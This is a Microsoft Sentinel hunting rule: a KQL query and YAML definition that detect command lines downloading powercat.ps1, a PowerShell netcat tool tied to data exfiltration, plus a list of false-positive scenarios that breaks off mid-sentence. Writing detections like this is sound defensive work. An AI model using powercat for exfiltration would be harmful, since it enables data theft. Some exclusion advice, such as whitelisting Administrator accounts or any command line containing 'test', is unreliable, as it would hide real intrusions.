Powercat download activity indicates potential exfiltration or command and control communication by an adversary leveraging PowerShell. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate early-stage network compromise attempts.
KQL Query
imProcessCreate
| where Process has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe")
| where CommandLine hassuffix "powercat.ps1"
| extend timestamp = TimeGenerated, AccountCustomEntity = User, HostCustomEntity = Dvc
id: 4846436d-5183-4a33-a975-fc892ffea91d
name: Powercat Download (Normalized Process Events)
description: |
'Powercat is a PowerShell implementation of netcat. Whilst it can be used as a legitimate administrative tool it can be abused by attackers to exfiltrate data. This query looks for command line activity downloading PowerCat.'
requiredDataConnectors:
- connectorId: SecurityEvents
dataTypes:
- SecurityEvent
tactics:
- Exfiltration
relevantTechniques:
- T1011
query: |
imProcessCreate
| where Process has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe")
| where CommandLine hassuffix "powercat.ps1"
| extend timestamp = TimeGenerated, AccountCustomEntity = User, HostCustomEntity = Dvc
entityMappings:
- entityType: Account
fieldMappings:
- identifier: FullName
columnName: AccountCustomEntity
- entityType: Host
fieldMappings:
- identifier: FullName
columnName: HostCustomEntity| Sentinel Table | Notes |
|---|---|
imProcessCreate | Ensure this data connector is enabled |
Scenario: Legitimate PowerShell Script Execution
Description: A system administrator is running a legitimate PowerShell script that uses PowerShell.exe to perform routine system maintenance or configuration tasks.
Filter/Exclusion: Use process.parent_process to exclude processes originating from known administrative tools like task scheduler, eventvwr.exe, or powershell.exe launched from a trusted script location (e.g., C:\Windows\System32\).
Scenario: Scheduled Job Running Powercat for Network Monitoring
Description: A scheduled job is configured to run a PowerShell script that uses Powercat to monitor network traffic or test connectivity.
Filter/Exclusion: Filter by process.command_line to exclude known network monitoring tools like tcping, Test-NetConnection, or PowerShell scripts that include specific keywords like "monitor" or "test".
Scenario: Admin Task Using Powercat for Remote Management
Description: An IT admin is using Powercat to remotely manage a server, such as initiating a remote PowerShell session or transferring files.
Filter/Exclusion: Use process.user to exclude processes initiated by privileged users (e.g., Administrator) or filter by process.parent_process to exclude mstsc.exe (Remote Desktop) or winrm commands.
Scenario: Powercat Used for Internal Tooling
Description: A company has an internal tool built using Powercat for internal communication between servers or for internal data transfer.
Filter/Exclusion: Filter by process.command_line to exclude known internal tools (e.g., internal-tool.exe) or use a custom field like process.associated_tool to mark trusted internal tools.
Scenario: Powercat Used for Secure File Transfer
Description: A DevOps team is using Powercat as